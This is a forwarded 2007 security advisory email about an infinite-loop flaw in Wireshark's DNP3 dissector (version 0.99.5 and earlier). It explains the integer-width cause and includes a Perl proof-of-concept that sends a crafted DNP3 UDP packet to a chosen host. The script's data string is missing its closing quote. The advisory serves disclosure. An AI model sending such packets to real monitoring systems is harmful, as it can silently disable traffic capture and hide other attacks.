> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Thursday, August 30, 2007 10:52 AM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NEWS] Wireshark DNP3 Dissector Infinite Loop Vulnerability
>
>
>
> Wireshark DNP3 Dissector Infinite Loop Vulnerability
>
>
>
> A vulnerability in Wireshark's DNP3 dissector allows
> attackers to cause it to enter an infinite loop which in turn
> can be used to mask other types of attacks from being
> captured by Wireshark.
>
>
> Vulnerable Systems:
> * Wireshark version 0.99.5 and prior
>
> Immune Systems:
> * Wireshark version 0.99.6 and newer
>
> A vulnerability in the way Wireshark handles DNP3 data allows
> an attacker to fool the dissector into thinking a negative
> value of items has been provided to it as part of the
> Application Layer's request to read/write objects. This in
> turn causes the loop found in the code:
> for (temp16 = 0; temp16 < num_items; temp16++)
> {
>
> To enter into an infinite loop as the temp16 parameter is
> defined as an unsigned int of a length of 16 bits while the
> num_items is defined as an unsigned int of a length of 32
> bits - which in turn means than a negative value will be
> casted into a larger than 16 bits value - as the temp16 will
> not be able to reach the value stored in the num_items parameter.
>
> Proof of Concept:
> The vulnerability can be recreated by either using beSTORM
> <http://www.beyondsecurity.com/bestorm_overview.html> with
> the DNP3 protocol fuzzer and monitoring the traffic generated
> with Wireshark or by launching the following exploit code:
> #!/usr/bin/perl
> # Automatically generated by beSTORM(tm)
> # Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $)
>
> # Attack vector:
> # M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0
>
> # Module:
> # DNP3
>
> use strict;
> use warnings;
>
> use Getopt::Std;
> use IO::Socket::INET;
>
> $SIG{INT} = \&abort;
>
> my $host = '192.168.4.52';
> my $port = 20000;
> my $proto = 'udp';
> my $sockType = SOCK_DGRAM;
> my $timeout = 1;
>
> #Read command line arguments
> my %opt;
> my $opt_string = 'hH:P:t:';
> getopts( "$opt_string", \%opt );
>
> if (defined $opt{h}) {
> usage()
> }
>
> $host = $opt{H} ? $opt{H} : $host;
> $port = $opt{P} ? $opt{P} : $port;
> $timeout = $opt{t} ? $opt{t} : $timeout;
>
> my @commands = (
> {Command => 'Send',
> Data =>
> "\xC3\xC0\x01\x01\x00\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08},
> {Command => 'Receive'},
>
> );
>
> ###
> # End user configurable part
> ###
>
> #1. Create a new connection
> my $sock = new IO::Socket::INET (
> PeerAddr => $host,
> PeerPort => $port,
> Proto => $proto,
> Type => $sockType,
> Timeout => $timeout,
> )
> or die "socket error: $!\n\n";
>
> print "connected to: $host:$port\n";
>
> $sock->autoflush(1);
> binmode $sock;
>
> #2. communication part
>
> foreach my $command (@commands)
> {
> if ($command->{'Command'} eq 'Receive')
> {
> my $buf = receive($sock, $timeout);
> if (length $buf)
> {
> print "received: [$buf]\n";
> }
> }
> elsif ($command->{'Command'} eq 'Send')
> {
> print "sending: [".$command->{'Data'}."]\n";
> send ($sock, $command->{'Data'}, 0) or die "send
> failed, reason: $!\n";
> }
> }
>
> #3. Close connection
> close ($sock);
>
> #The end
>
> sub receive
> {
> my $sock = shift;
> my $timeout = shift;
>
> my $tmpbuf;
> my $buf = "";
>
> while(1)
> { # Example from perldoc -f alarm
> eval {
> local $SIG{ALRM} = sub { die "timeout\n" };
> alarm $timeout;
>
> my $ret = read $sock, $tmpbuf, 1; #We read data one byte
> at a time.
> if ( !defined $ret or $ret == 0 )
> { #EOF
> die "timeout\n";
> }
>
> alarm 0;
> $buf .= $tmpbuf;
> };
> if ($@) { #time out
> if($@ eq "timeout\n")
> {
> last;
> }
> else {
> die "receive aborted\n";
> }
> }
> } #while
> return $buf;
> }
>
> sub abort
> {
> print "aborting...\n";
> if ($sock)
> {
> close $sock;
> }
> die "User aborted operation\n";
> }
> sub usage
> {
> print "usage: $0 [-hHPt]\n";
> print "-h\t: this help message\n";
> print "-H\t: override default host - $host\n";
> print "-P\t: override default port - $port\n";
> print "-t\t: set socket timeout in seconds\n";
> exit 0;
> }
>
>
> Additional Information:
> The information has been provided by beSTORM.
> The original article can be found at:
> http://www.beyondsecurity.com/bestorm_overview.html
>
>